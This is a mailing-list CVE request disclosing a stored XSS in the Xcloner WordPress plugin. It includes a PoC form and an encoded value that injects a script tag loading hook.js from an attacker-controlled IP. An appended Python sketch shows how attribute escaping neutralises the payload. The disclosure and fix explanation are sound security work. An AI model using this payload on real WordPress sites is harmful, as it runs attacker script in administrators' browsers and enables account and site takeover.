Message-ID: <3626D6E697A150459C44C0E5D8D8D00E0DBE8BDF@EX02.corp.qihoo.net>
Date: Wed, 27 Jul 2016 02:35:46 +0000
From: limingxing <limingxing@....cn>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: CVE request : a stored XSS in Xcloner for wordpress

Hi

     I found a stored XSS in Xcloner for wordpress.  The XSS filter can 
be bypassed.

     Here is the plugin page
     https://wordpress.org/plugins/xcloner-backup-and-restore/

     PoC

     In the "Cron setting" page (URL is
     "http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"),
     set the "Backup name" (cron_bname) to a value like
     "1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"

     <html>
         <form action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config" method="post">
             <input type="hidden" name="cron_bname" value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" />
             <input type="submit" name="submit">
         </form>
     </html>


     Fix
     Update to version 3.1.5

     Change

     https://plugins.trac.wordpress.org/changeset/1456784


     Could you assign a CVE ID for it?

Chen Ruiqi
Codesafe Team
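
Added example (not part of the original message and not the plugin's code): the PoC value ends in " on" so that the closing quote and bracket of the surrounding attribute complete the injected script tag. The Python sketch below renders the decoded value into an assumed input template, with and without attribute escaping, and parses the result to see which elements a browser-style parser would create; FIELD, render_raw, render_escaped and audit are illustrative names.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Value from the PoC above, exactly as posted (URL-encoded form data).
POC_VALUE = "1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"

# Assumed markup for the settings field; the plugin's real template
# is not shown in the post.
FIELD = '<input type="text" name="cron_bname" value="{}">'


class TagAudit(HTMLParser):
    """Records every start tag and the value attribute of the input element."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def audit(markup):
    """Return (list of start tags, value seen on the input element)."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_value


def render_raw(value):
    # Stored value echoed into the attribute unchanged.
    return FIELD.format(value)


def render_escaped(value):
    # Stored value escaped for an HTML attribute context (quotes included).
    return FIELD.format(escape(value, quote=True))


STORED = unquote_plus(POC_VALUE)  # what the server stores after form decoding

if __name__ == "__main__":
    print("raw:    ", audit(render_raw(STORED)))
    print("escaped:", audit(render_escaped(STORED)))
```

In the raw rendering the input's value is cut to "1" and a script element follows it; in the escaped rendering the whole string stays inside the value attribute. In WordPress code the corresponding output-escaping helper is esc_attr().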
